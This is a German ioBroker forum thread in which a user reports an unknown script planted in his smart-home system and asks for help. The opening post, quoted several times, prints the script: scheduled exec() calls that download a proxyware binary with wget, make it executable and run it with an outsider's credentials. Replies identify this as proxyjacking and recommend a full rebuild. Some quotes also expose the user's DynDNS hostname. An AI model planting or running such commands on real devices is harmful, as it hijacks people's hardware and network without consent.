Skip to content
  • Aktuell
  • Tags
  • 0 Ungelesen 0
  • Kategorien
  • Unreplied
  • Beliebt
  • GitHub
  • Docu
  • Hilfe
Skins
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Standard: (Kein Skin)
  • Kein Skin
Einklappen
ioBroker Logo
  1. ioBroker Community Home
  2. Deutsch
  3. Skripten / Logik
  4. [gelöst]Seltsames Script unter Global

NEWS

  • UPDATE 31.10.: Amazon Alexa - ioBroker Skill läuft aus ?
    apollon77A
    apollon77
    48
    3
    8.2k

  • Monatsrückblick – September 2025
    BluefoxB
    Bluefox
    13
    1
    1.9k

  • Neues Video "KI im Smart Home" - ioBroker plus n8n
    BluefoxB
    Bluefox
    15
    1
    2.2k

[gelöst]Seltsames Script unter Global

Geplant Angeheftet Gesperrt Verschoben Skripten / Logik
27 Beiträge 5 Kommentatoren 2.8k Aufrufe 4 Watching
  • Älteste zuerst
  • Neuste zuerst
  • Meiste Stimmen
Antworten
  • In einem neuen Thema antworten
Anmelden zum Antworten
Dieses Thema wurde gelöscht. Nur Nutzer mit entsprechenden Rechten können es sehen.
  • C Offline
    C Offline
    chemieka
    schrieb am zuletzt editiert von chemieka
    #1

    Hallo
    Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
    Wenn ich mir das anschauen, denke ich mir da ist was faul.
    Der Inhalt wäre folgendes:

    exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
    schedule("10 6 */2 * *", async function () {
      exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
    });
    

    Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?

    Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.Screenshot 2023-06-23 180440.jpg

    DJMarc75D crunchipC GlasfaserG OliverIOO 4 Antworten Letzte Antwort
    0
    • C chemieka

      Hallo
      Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
      Wenn ich mir das anschauen, denke ich mir da ist was faul.
      Der Inhalt wäre folgendes:

      exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
      schedule("10 6 */2 * *", async function () {
        exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
      });
      

      Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?

      Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.Screenshot 2023-06-23 180440.jpg

      DJMarc75D Online
      DJMarc75D Online
      DJMarc75
      schrieb am zuletzt editiert von
      #2

      @chemieka sagte in Seltsames Script unter Global:

      Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme

      Und wir bewegen uns bei Dir auf was für einem System ? Windows ?

      Lehrling seit 1975 !!!
      Beitrag geholfen ? dann gerne ein upvote rechts unten im Beitrag klicken ;)
      https://forum.iobroker.net/topic/51555/hinweise-f%C3%BCr-gute-forenbeitr%C3%A4ge

      1 Antwort Letzte Antwort
      0
      • C Offline
        C Offline
        chemieka
        schrieb am zuletzt editiert von chemieka
        #3

        Das ist eine PI4. Normale Installation von IOBroker laut hier:
        https://forum.iobroker.net/topic/51869/installation-auf-raspi-einfacher-geht-s-nicht

        Das Script ist nur zu finden wenn Expert Aktiviert ist, sonst ist der Ordner Global nicht zu sehen.

        Das System ist neu aufgesetzt und dann das Backup eingespielt. Zwei Tage alt.

        Da steckt wohl das hier dahinter: https://pawns.app/
        Möchte meinen da wollte oder hat sich jemand meine PI4 leihen wollen.
        Wüsste gern ob es gelungen ist und wenn ja wie ich das runter bekomme.

        1 Antwort Letzte Antwort
        0
        • C chemieka

          Hallo
          Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
          Wenn ich mir das anschauen, denke ich mir da ist was faul.
          Der Inhalt wäre folgendes:

          exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
          schedule("10 6 */2 * *", async function () {
            exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
          });
          

          Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?

          Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.Screenshot 2023-06-23 180440.jpg

          crunchipC Abwesend
          crunchipC Abwesend
          crunchip
          Forum Testing Most Active
          schrieb am zuletzt editiert von
          #4

          @chemieka Geld verdienen?
          https://github.com/IPRoyal/pawns-cli/blob/main/readme.md

          umgestiegen von Proxmox auf Unraid

          C 1 Antwort Letzte Antwort
          0
          • crunchipC crunchip

            @chemieka Geld verdienen?
            https://github.com/IPRoyal/pawns-cli/blob/main/readme.md

            C Offline
            C Offline
            chemieka
            schrieb am zuletzt editiert von chemieka
            #5

            @crunchip
            Na das hatte ich auch gefunden. Aber sicher nicht selber drauf gemacht. Das System ist ja nur zwei Tage alt. Über das Backup evtl. wieder draufgekommen?

            crunchipC 1 Antwort Letzte Antwort
            0
            • C chemieka

              @crunchip
              Na das hatte ich auch gefunden. Aber sicher nicht selber drauf gemacht. Das System ist ja nur zwei Tage alt. Über das Backup evtl. wieder draufgekommen?

              crunchipC Abwesend
              crunchipC Abwesend
              crunchip
              Forum Testing Most Active
              schrieb am zuletzt editiert von crunchip
              #6

              @chemieka na entweder selbst oder du hast ganz andere Probleme, dann solltest du dein Netzwerk mal checken und wer weiß was sonst noch so sein könnte

              Portfreigabe für iobroker?

              umgestiegen von Proxmox auf Unraid

              C 1 Antwort Letzte Antwort
              0
              • crunchipC crunchip

                @chemieka na entweder selbst oder du hast ganz andere Probleme, dann solltest du dein Netzwerk mal checken und wer weiß was sonst noch so sein könnte

                Portfreigabe für iobroker?

                C Offline
                C Offline
                chemieka
                schrieb am zuletzt editiert von chemieka
                #7

                @crunchip
                Ich nehme an das Script ist schon länger drauf und ist über das Backup wieder drauf gekommen.
                Wie könnte ich prüfen ob die Installation durchgeführt wurde?

                Möchte das nicht ausschließen, dass ich mal einen Port offen hatte in der Vergangenheit aber jetzt auf keinen Fall.

                crunchipC 1 Antwort Letzte Antwort
                0
                • C chemieka

                  Hallo
                  Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
                  Wenn ich mir das anschauen, denke ich mir da ist was faul.
                  Der Inhalt wäre folgendes:

                  exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
                  schedule("10 6 */2 * *", async function () {
                    exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
                  });
                  

                  Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?

                  Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.Screenshot 2023-06-23 180440.jpg

                  GlasfaserG Offline
                  GlasfaserG Offline
                  Glasfaser
                  schrieb am zuletzt editiert von Glasfaser
                  #8

                  @chemieka sagte in Seltsames Script unter Global:

                  device-name=xxxxxxxxxx@io

                  was auch komisch ist ...das xxxxxxxxxxxxxxXXXXXXXXXXXXXXX

                  Hast du eine DynDNS Service

                  EDIT :

                  DynDNS von @chemieka unkenntlich gemacht

                  Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                  GlasfaserG 1 Antwort Letzte Antwort
                  1
                  • C chemieka

                    @crunchip
                    Ich nehme an das Script ist schon länger drauf und ist über das Backup wieder drauf gekommen.
                    Wie könnte ich prüfen ob die Installation durchgeführt wurde?

                    Möchte das nicht ausschließen, dass ich mal einen Port offen hatte in der Vergangenheit aber jetzt auf keinen Fall.

                    crunchipC Abwesend
                    crunchipC Abwesend
                    crunchip
                    Forum Testing Most Active
                    schrieb am zuletzt editiert von
                    #9

                    @chemieka ich bin da kein Spezialist für
                    da steht bisserl Hintergrund info
                    https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/

                    umgestiegen von Proxmox auf Unraid

                    C 1 Antwort Letzte Antwort
                    0
                    • crunchipC crunchip

                      @chemieka ich bin da kein Spezialist für
                      da steht bisserl Hintergrund info
                      https://netzpalaver.de/2023/04/12/cyberkriminelle-entdecken-proxyjacking-als-neue-einnahmequelle/

                      C Offline
                      C Offline
                      chemieka
                      schrieb am zuletzt editiert von
                      #10

                      @crunchip
                      Der Hintergrund ist mir bekannt bzw. schon gelesen.
                      Könnte man irgendwie erkennen ob die Installation drauf ist? Seltsam ist auch, die Dateien im Tmp sind vom Anfang Juni. Das System aber zwei Tage alt. Hm.
                      Ich glaube ich mache nochmal eine neue Karte fertig und schau mal dann.

                      1 Antwort Letzte Antwort
                      0
                      • GlasfaserG Glasfaser

                        @chemieka sagte in Seltsames Script unter Global:

                        device-name=xxxxxxxxxx@io

                        was auch komisch ist ...das xxxxxxxxxxxxxxXXXXXXXXXXXXXXX

                        Hast du eine DynDNS Service

                        EDIT :

                        DynDNS von @chemieka unkenntlich gemacht

                        GlasfaserG Offline
                        GlasfaserG Offline
                        Glasfaser
                        schrieb am zuletzt editiert von
                        #11

                        @glasfaser sagte in Seltsames Script unter Global:

                        @chemieka sagte in Seltsames Script unter Global:

                        device-name=chemieka.ddnss.de@io

                        was auch komisch ist ...das ich auch dein Username ...

                        Hast du eine DynDNS Service

                        Was ist hiermit !?

                        Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?

                        Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                        C 1 Antwort Letzte Antwort
                        0
                        • GlasfaserG Glasfaser

                          @glasfaser sagte in Seltsames Script unter Global:

                          @chemieka sagte in Seltsames Script unter Global:

                          device-name=chemieka.ddnss.de@io

                          was auch komisch ist ...das ich auch dein Username ...

                          Hast du eine DynDNS Service

                          Was ist hiermit !?

                          Bist du bei der Telekom . Fritzbox . und hast die IP am Ende mit 06 !?

                          C Offline
                          C Offline
                          chemieka
                          schrieb am zuletzt editiert von
                          #12

                          @glasfaser
                          Ja das stimmt schon, werde das mal ändern. Aber ein Port zu IOBroker ist nicht offen.

                          GlasfaserG 1 Antwort Letzte Antwort
                          0
                          • C chemieka

                            @glasfaser
                            Ja das stimmt schon, werde das mal ändern. Aber ein Port zu IOBroker ist nicht offen.

                            GlasfaserG Offline
                            GlasfaserG Offline
                            Glasfaser
                            schrieb am zuletzt editiert von
                            #13

                            @chemieka sagte in Seltsames Script unter Global:

                            Ja das stimmt schon,

                            Die DynDNS ist von dir selber oder die IP mit der 06 !?

                            Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                            C 1 Antwort Letzte Antwort
                            0
                            • GlasfaserG Glasfaser

                              @chemieka sagte in Seltsames Script unter Global:

                              Ja das stimmt schon,

                              Die DynDNS ist von dir selber oder die IP mit der 06 !?

                              C Offline
                              C Offline
                              chemieka
                              schrieb am zuletzt editiert von
                              #14

                              @glasfaser
                              beides.

                              GlasfaserG 2 Antworten Letzte Antwort
                              0
                              • C chemieka

                                @glasfaser
                                beides.

                                GlasfaserG Offline
                                GlasfaserG Offline
                                Glasfaser
                                schrieb am zuletzt editiert von
                                #15

                                @chemieka

                                Dann sage doch ... du hast auch gerade dazu den Start Thread bearbeitet , mit xxx

                                denn ich habe die DynDNS Adresse in meinem Post auch drin !!!
                                Werde Ihn dazu editieren !!

                                Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                                C 1 Antwort Letzte Antwort
                                0
                                • GlasfaserG Glasfaser

                                  @chemieka

                                  Dann sage doch ... du hast auch gerade dazu den Start Thread bearbeitet , mit xxx

                                  denn ich habe die DynDNS Adresse in meinem Post auch drin !!!
                                  Werde Ihn dazu editieren !!

                                  C Offline
                                  C Offline
                                  chemieka
                                  schrieb am zuletzt editiert von
                                  #16

                                  @glasfaser
                                  Ja bitte. System mal neu Aufsetzen.

                                  1 Antwort Letzte Antwort
                                  0
                                  • C chemieka

                                    Hallo
                                    Ich habe hier ein Script unter Global stehen welches ich nicht selber installiert habe.
                                    Wenn ich mir das anschauen, denke ich mir da ist was faul.
                                    Der Inhalt wäre folgendes:

                                    exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
                                    schedule("10 6 */2 * *", async function () {
                                      exec('cd /tmp ; wget https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli ; chmod +x pawns-cli ; ./pawns-cli -email=ryanreynolds284@protonmail.com -password=goodluck999! -device-name=xxx@io --accept-tos');
                                    });
                                    

                                    Das Script habe ich gestoppt. Denke aber mal das da ein Plugin installiert worden sein könnte. Wie könnte ich das finden und wieder löschen? Was sagt ihr?

                                    Unter tmp liegt dann auch so ein Müll welchen ich nicht gelöscht bekomme.Screenshot 2023-06-23 180440.jpg

                                    OliverIOO Offline
                                    OliverIOO Offline
                                    OliverIO
                                    schrieb am zuletzt editiert von
                                    #17

                                    @chemieka
                                    so ein system ist nicht mehr vertrauenswürdig.
                                    wer weiß was da noch so auf dem system drauf ist oder sich
                                    über so eine anwendung mit drauf gepfriemelt hat.

                                    eigentlich bleibt nur noch eins,
                                    alles platt machen
                                    neu aufbauen
                                    ob du dem backup noch vertraust musst du selber überlegen
                                    ich würde es nicht.

                                    Meine Adapter und Widgets
                                    TVProgram, SqueezeboxRPC, OpenLiga, RSSFeed, MyTime,, pi-hole2, vis-json-template, skiinfo, vis-mapwidgets, vis-2-widgets-rssfeed
                                    Links im Profil

                                    C 1 Antwort Letzte Antwort
                                    1
                                    • C chemieka

                                      @glasfaser
                                      beides.

                                      GlasfaserG Offline
                                      GlasfaserG Offline
                                      Glasfaser
                                      schrieb am zuletzt editiert von
                                      #18

                                      @chemieka sagte in Seltsames Script unter Global:

                                      @glasfaser
                                      beides.

                                      Große Frage ... wie kommt Mister X an deine DynDNS ,
                                      hast du Sie in ioBroker oder wo anderes auch hinterlegt !?

                                      Synology 918+ 16GB - ioBroker in Docker v9 , VISO auf Trekstor Primebook C13 13,3" , Hikvision Domkameras mit Surveillance Station .. CCU RaspberryMatic in Synology VM .. Zigbee CC2538+CC2592 .. Sonoff .. KNX .. Modbus ..

                                      OliverIOO 1 Antwort Letzte Antwort
                                      0
                                      • OliverIOO OliverIO

                                        @chemieka
                                        so ein system ist nicht mehr vertrauenswürdig.
                                        wer weiß was da noch so auf dem system drauf ist oder sich
                                        über so eine anwendung mit drauf gepfriemelt hat.

                                        eigentlich bleibt nur noch eins,
                                        alles platt machen
                                        neu aufbauen
                                        ob du dem backup noch vertraust musst du selber überlegen
                                        ich würde es nicht.

                                        C Offline
                                        C Offline
                                        chemieka
                                        schrieb am zuletzt editiert von
                                        #19

                                        @oliverio
                                        So mache ich das. Das Script lösche ich dann ein Backup machen. Alles neu erstellen.

                                        OliverIOO 1 Antwort Letzte Antwort
                                        0
                                        • GlasfaserG Glasfaser

                                          @chemieka sagte in Seltsames Script unter Global:

                                          @glasfaser
                                          beides.

                                          Große Frage ... wie kommt Mister X an deine DynDNS ,
                                          hast du Sie in ioBroker oder wo anderes auch hinterlegt !?

                                          OliverIOO Offline
                                          OliverIOO Offline
                                          OliverIO
                                          schrieb am zuletzt editiert von
                                          #20

                                          @glasfaser

                                          wer einmal im netz ist, kann ja theoretisch alle rechner erreichen.
                                          wenn auf diesen dann auch eine laxe security existiert, dann ist nix sicher.
                                          nas/samba-freigabe ohne passwort?
                                          windows ohne passwort?
                                          raspberries mit standard login?
                                          nas mit standard login?
                                          etc.

                                          als Ergänzung zu meinem obigen post. theoretisch ist das ganze netz verunreinigt.

                                          Meine Adapter und Widgets
                                          TVProgram, SqueezeboxRPC, OpenLiga, RSSFeed, MyTime,, pi-hole2, vis-json-template, skiinfo, vis-mapwidgets, vis-2-widgets-rssfeed
                                          Links im Profil

                                          1 Antwort Letzte Antwort
                                          1
                                          Antworten
                                          • In einem neuen Thema antworten
                                          Anmelden zum Antworten
                                          • Älteste zuerst
                                          • Neuste zuerst
                                          • Meiste Stimmen


                                          Support us

                                          ioBroker
                                          Community Adapters
                                          Donate

                                          475

                                          Online

                                          32.4k

                                          Benutzer

                                          81.4k

                                          Themen

                                          1.3m

                                          Beiträge
                                          Community
                                          Impressum | Datenschutz-Bestimmungen | Nutzungsbedingungen | Einwilligungseinstellungen
                                          ioBroker Community 2014-2025
                                          logo
                                          • Anmelden

                                          • Du hast noch kein Konto? Registrieren

                                          • Anmelden oder registrieren, um zu suchen
                                          • Erster Beitrag
                                            Letzter Beitrag
                                          0
                                          • Aktuell
                                          • Tags
                                          • Ungelesen 0
                                          • Kategorien
                                          • Unreplied
                                          • Beliebt
                                          • GitHub
                                          • Docu
                                          • Hilfe